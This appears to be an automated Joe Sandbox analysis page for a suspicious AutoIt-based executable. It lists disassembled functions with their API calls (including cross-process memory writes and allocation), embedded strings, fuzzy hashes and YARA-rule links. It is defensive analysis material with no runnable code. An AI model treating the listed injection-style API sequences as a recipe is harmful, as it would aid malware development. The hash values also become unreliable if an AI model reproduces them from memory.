Opcode ID: 47c7d47a9e2fa406a350faf53631827d980e5ea74dc94ca56529c7a6186ed4b8
Instruction ID: 555b3972824a5193c53498d5db8cd11a3f6d6d4c3b0178bf26455166ee07c230
Opcode Fuzzy Hash: 47c7d47a9e2fa406a350faf53631827d980e5ea74dc94ca56529c7a6186ed4b8
Instruction Fuzzy Hash: 4EF01930005388EFDB26AF66ED68B643B65AB91362F048254F465A91F0C7308A9BDF30

Function 00D80F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 00D810F9
__freea.LIBCMT ref: 00D81117

Part of subcall function 00D81537: _free.LIBCMT ref: 00D8154F

Strings

am/pm, xrefs: 00D8117A
a/p, xrefs: 00D811DE

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: __freea$_free
String ID: a/p$am/pm
API String ID: 3432400110-3206640213
Opcode ID: 98dfd22241e77bd8369b3e99c4f9451d3bea0f30efb43c7686b49921a1e8ce06
Instruction ID: 5f77c40d6364d37d01246038b00eab12a46620f00e84cc26b33a316e54c97965
Opcode Fuzzy Hash: 98dfd22241e77bd8369b3e99c4f9451d3bea0f30efb43c7686b49921a1e8ce06
Instruction Fuzzy Hash: F3D12779900206DACB24BF68C845BFEB7B8FF06700F2C4259E9459B650D3759D8ACBB1

Function 00DD61D0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 324COMMON

Download Yara Rule

APIs

Part of subcall function 00D70242: EnterCriticalSection.KERNEL32(00E2070C,00E21884,?,?,00D6198B,00E22518,?,?,?,00D512F9,00000000), ref: 00D7024D
Part of subcall function 00D70242: LeaveCriticalSection.KERNEL32(00E2070C,?,00D6198B,00E22518,?,?,?,00D512F9,00000000), ref: 00D7028A

Part of subcall function 00D700A3: __onexit.LIBCMT ref: 00D700A9

__Init_thread_footer.LIBCMT ref: 00DD6238

Part of subcall function 00D701F8: EnterCriticalSection.KERNEL32(00E2070C,?,?,00D68747,00E22514), ref: 00D70202
Part of subcall function 00D701F8: LeaveCriticalSection.KERNEL32(00E2070C,?,00D68747,00E22514), ref: 00D70235

Part of subcall function 00DC359C: LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 00DC35E4
Part of subcall function 00DC359C: LoadStringW.USER32(00E22390,?,00000FFF,?), ref: 00DC360A

Strings

x#, xrefs: 00DD6353
x#, xrefs: 00DD633A
x#, xrefs: 00DD636F

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
String ID: x#$x#$x#
API String ID: 1072379062-1894725482
Opcode ID: ccd5aea844d62343feee71bff0bf3c8e6d193b5df444377f3f542df8da55a48a
Instruction ID: 7cc762ee3c43aba81489b560e292567f05d35f1dcc894a2465332270c27e9085
Opcode Fuzzy Hash: ccd5aea844d62343feee71bff0bf3c8e6d193b5df444377f3f542df8da55a48a
Instruction Fuzzy Hash: 8DC13B71A00205AFDB14DF98D891EBEB7B9EF48310F14806AF955AB391DB70E945CBB0

Function 00DD7B7E Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 230COMMON

Download Yara Rule

APIs

Part of subcall function 00D70242: EnterCriticalSection.KERNEL32(00E2070C,00E21884,?,?,00D6198B,00E22518,?,?,?,00D512F9,00000000), ref: 00D7024D
Part of subcall function 00D70242: LeaveCriticalSection.KERNEL32(00E2070C,?,00D6198B,00E22518,?,?,?,00D512F9,00000000), ref: 00D7028A

Part of subcall function 00D59CB3: _wcslen.LIBCMT ref: 00D59CBD

Part of subcall function 00D700A3: __onexit.LIBCMT ref: 00D700A9

__Init_thread_footer.LIBCMT ref: 00DD7BFB

Part of subcall function 00D701F8: EnterCriticalSection.KERNEL32(00E2070C,?,?,00D68747,00E22514), ref: 00D70202
Part of subcall function 00D701F8: LeaveCriticalSection.KERNEL32(00E2070C,?,00D68747,00E22514), ref: 00D70235

Strings

Variable must be of type 'Object'., xrefs: 00DD7C3A
G, xrefs: 00DD7C7F
5, xrefs: 00DD7C78

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
String ID: 5$G$Variable must be of type 'Object'.
API String ID: 535116098-3733170431
Opcode ID: edb411f6fea1dd0dfe05c461e821e6df4adea7bdfa13a9e4b6e295694e291559
Instruction ID: d84a6ac7081d19501618c857c87b92a6438ae849d0b13721bcec6a96e2422fd4
Opcode Fuzzy Hash: edb411f6fea1dd0dfe05c461e821e6df4adea7bdfa13a9e4b6e295694e291559
Instruction Fuzzy Hash: 8D914C74A04209EFCB14EF58D891DADB7B2EF45300F54809AF8466B392EB71AE45CB71

Function 00DB2716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00DBB403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00DB21D0,?,?,00000034,00000800,?,00000034), ref: 00DBB42D

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00DB2760

Part of subcall function 00DBB3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00DB21FF,?,?,00000800,?,00001073,00000000,?,?), ref: 00DBB3F8

Part of subcall function 00DBB32A: GetWindowThreadProcessId.USER32(?,?), ref: 00DBB355
Part of subcall function 00DBB32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00DB2194,00000034,?,?,00001004,00000000,00000000), ref: 00DBB365
Part of subcall function 00DBB32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00DB2194,00000034,?,?,00001004,00000000,00000000), ref: 00DBB37B

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00DB27CD
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00DB281A

Strings

@, xrefs: 00DB2832

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: a250306e48f165d566b102f34dbf64a65b66ced52f299e127353207d7e63ca96
Instruction ID: 6777ecdeb9f7d47a41df66c33a5d98648e42874347834f1027a68a2bb705f1d5
Opcode Fuzzy Hash: a250306e48f165d566b102f34dbf64a65b66ced52f299e127353207d7e63ca96
Instruction Fuzzy Hash: D2413C76900218AFDB10DBA4CD85AEEBBB8EF09710F004059FA56B7291DB706E45CBB0

Function 00D8172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user~1\AppData\Local\Temp\1000029001\139d3265bb.exe,00000104), ref: 00D81769
_free.LIBCMT ref: 00D81834
_free.LIBCMT ref: 00D8183E

Strings

C:\Users\user~1\AppData\Local\Temp\1000029001\139d3265bb.exe, xrefs: 00D81760, 00D81767, 00D81796, 00D817CE

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user~1\AppData\Local\Temp\1000029001\139d3265bb.exe
API String ID: 2506810119-3821335046
Opcode ID: c7bac39378af856dcdee4621bc4e80d4fda51a48f8acd754d4fb8591968c07b7
Instruction ID: 8be9897268593eb0e2c417e668d5b0c0c6cd375cec023cc318e7feca514d3ffd
Opcode Fuzzy Hash: c7bac39378af856dcdee4621bc4e80d4fda51a48f8acd754d4fb8591968c07b7
Instruction Fuzzy Hash: 66318279A00258FFDB21EB999C81D9EBBFCEB95710B1441AAF404D7211D6708E4ACBB0

Function 00DBC27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00DBC306
DeleteMenu.USER32(?,00000007,00000000), ref: 00DBC34C
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00E21990,01774778), ref: 00DBC395

Strings

0, xrefs: 00DBC2DF

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: d3a1793d3431f11b800206a3b88361a56aa76cf80299aed5cb622c28415f6e7f
Instruction ID: dc1244f17176f1578f21f283a42f512db824ce1d81dec1185eec4fc4c635348a
Opcode Fuzzy Hash: d3a1793d3431f11b800206a3b88361a56aa76cf80299aed5cb622c28415f6e7f
Instruction Fuzzy Hash: 6A418D71214341DFD720DF24D884B9ABBE4FB85320F08961EE8A697391DB70A904CB72

Function 00DE4416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00DECC08,00000000,?,?,?,?), ref: 00DE44AA
GetWindowLongW.USER32 ref: 00DE44C7
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00DE44D7

Strings

SysTreeView32, xrefs: 00DE447C

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: c300e16237384c64bd52cd28b075ff719c617ec189b59583c80c76da671f8f5d
Instruction ID: 96f48165ad4522b79b081b16231a66be912674f2af9c5d0ef0aaa883539f1f01
Opcode Fuzzy Hash: c300e16237384c64bd52cd28b075ff719c617ec189b59583c80c76da671f8f5d
Instruction Fuzzy Hash: B9317C31210285AFDB21AE39DC45BEA77A9EB08334F244715F979A21E0D770EC559770

Function 00DD304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00DD335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00DD3077,?,?), ref: 00DD3378

inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00DD307A
_wcslen.LIBCMT ref: 00DD309B
htons.WSOCK32(00000000,?,?,00000000), ref: 00DD3106

Strings

255.255.255.255, xrefs: 00DD3095, 00DD309A

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: ByteCharMultiWide_wcslenhtonsinet_addr
String ID: 255.255.255.255
API String ID: 946324512-2422070025
Opcode ID: b7272e3f1a150490c17338b61d71ba4428dc065a9bdce9c7db2d36eecdb73b18
Instruction ID: a072101d8c15f438f98c0a69b0601860d8008e263ed0fde2150dffffc3274222
Opcode Fuzzy Hash: b7272e3f1a150490c17338b61d71ba4428dc065a9bdce9c7db2d36eecdb73b18
Instruction Fuzzy Hash: DA31B539604306DFCB10DF68C986EA977E0EF54318F28805AE9159B392D771EE45C772

Function 00DE4653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00DE4705
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00DE4713
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00DE471A

Strings

msctls_updown32, xrefs: 00DE4684

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: f392be99a82390cfa32056a16e551272ddb91bd7ed42500f89d7c4e9a7662a1f
Instruction ID: d2ca45ac6f95bdc6390f5394b42e3cfecb100a46349fce1a30093937638e706e
Opcode Fuzzy Hash: f392be99a82390cfa32056a16e551272ddb91bd7ed42500f89d7c4e9a7662a1f
Instruction Fuzzy Hash: 312151B5600244AFDB10EF65DCC1DA737ADEB5A364B040059F9049B351C730EC52CAB0

Function 00DB95AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00DB961D

Strings

#notrayicon, xrefs: 00DB95B7
#requireadmin, xrefs: 00DB95D9
#OnAutoItStartRegister, xrefs: 00DB95F3

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: _wcslen
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 176396367-2734436370
Opcode ID: 0fe6733254a7510237eeee88e714606a05be19d09ca3a9fb25321fe4698fc8b3
Instruction ID: f71849f42c6602dc32a8b06a299be6d7a1c04baf265be4a410dd2957af51dd0e
Opcode Fuzzy Hash: 0fe6733254a7510237eeee88e714606a05be19d09ca3a9fb25321fe4698fc8b3
Instruction Fuzzy Hash: 17213832144590E6C731AB259C22FFBF3D8DF51310F688026FA8B97041EB51DD45C2B5

Function 00DE37B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00DE3840
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00DE3850
MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00DE3876

Strings

Listbox, xrefs: 00DE380F

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 6775a58db2521362da628c3b36b3054ebea8bb8b465f50ff16b7fc3d05d9727e
Instruction ID: 964039bd82c926fa1c282632de3cae50699b34f0970fb55feea296dd815b1af9
Opcode Fuzzy Hash: 6775a58db2521362da628c3b36b3054ebea8bb8b465f50ff16b7fc3d05d9727e
Instruction Fuzzy Hash: 7121B072610258BBEF21AF56CC85EBB376AEF89750F148124F9049B190C671DC5287B0

Function 00DC49F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00DC4A08
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00DC4A5C
SetErrorMode.KERNEL32(00000000,?,?,00DECC08), ref: 00DC4AD0

Strings

%lu, xrefs: 00DC4A6F

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: %lu
API String ID: 2507767853-685833217
Opcode ID: 879f3a45fd1402599bfa9913ff398565823a11764d4cc14f68c855e1926faf42
Instruction ID: 8c4bf0888f3301cb2959e9203d712388ca4e83075a7ca6b147c0455064636338
Opcode Fuzzy Hash: 879f3a45fd1402599bfa9913ff398565823a11764d4cc14f68c855e1926faf42
Instruction Fuzzy Hash: DC310F75A00209AFDB10DF54C995EAABBF8EF05308F144099E905DB252D771ED46CB71

Function 00DE41EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00DE424F
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00DE4264
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00DE4271

Strings

msctls_trackbar32, xrefs: 00DE4226

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 0f57b04a401207579ebe7ef4aff0002ebc84143fab80f04e0133d25987c76446
Instruction ID: 4a9f3a86b7453b06195bae8776b9ebdcb825bbd68498f46328066533881dc610
Opcode Fuzzy Hash: 0f57b04a401207579ebe7ef4aff0002ebc84143fab80f04e0133d25987c76446
Instruction Fuzzy Hash: 96110631240388BEEF206F2ACC46FAB3BACEF95B64F010124FA55E60A0D271DC519B34

Function 00DB2F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D56B57: _wcslen.LIBCMT ref: 00D56B6A

Part of subcall function 00DB2DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00DB2DC5
Part of subcall function 00DB2DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00DB2DD6
Part of subcall function 00DB2DA7: GetCurrentThreadId.KERNEL32 ref: 00DB2DDD
Part of subcall function 00DB2DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00DB2DE4

GetFocus.USER32 ref: 00DB2F78

Part of subcall function 00DB2DEE: GetParent.USER32(00000000), ref: 00DB2DF9

GetClassNameW.USER32(?,?,00000100), ref: 00DB2FC3
EnumChildWindows.USER32(?,00DB303B), ref: 00DB2FEB

Strings

%s%d, xrefs: 00DB2FFF

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
String ID: %s%d
API String ID: 1272988791-1110647743
Opcode ID: 14a557e369a5896c7ea77ba19bf7b47a49d427ae80011dedb9dde8c2f9831634
Instruction ID: 2ef3ebfcc08ab3952e51c6bc006e91a5fe79b3eca32a3ec0fd3545f280e8f349
Opcode Fuzzy Hash: 14a557e369a5896c7ea77ba19bf7b47a49d427ae80011dedb9dde8c2f9831634
Instruction Fuzzy Hash: 3511A272600205ABCF147F648CC5EFE376AEF94305F045079BD0A9B252EE74994A9B70

Function 00DE5882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00DE58C1
SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00DE58EE
DrawMenuBar.USER32(?), ref: 00DE58FD

Strings

0, xrefs: 00DE588F

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Menu$InfoItem$Draw
String ID: 0
API String ID: 3227129158-4108050209
Opcode ID: 6be0289a83a30f1e1701a5cfac9de49f853768b904484f3e557d9634e1df7859
Instruction ID: 40421b8ff0652c859e914a152032de7221ff2c48c2b40abf576fbd776f24033a
Opcode Fuzzy Hash: 6be0289a83a30f1e1701a5cfac9de49f853768b904484f3e557d9634e1df7859
Instruction Fuzzy Hash: 51016131500298EFDB11AF12EC44BEEBBB4FB453A4F148099F949DA252DB308A94DF31

Function 00DB007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e84291088a025ab63d40a52a5b8e9209de6de2ebd4ea2cb5e2f35c2e0a9023f9
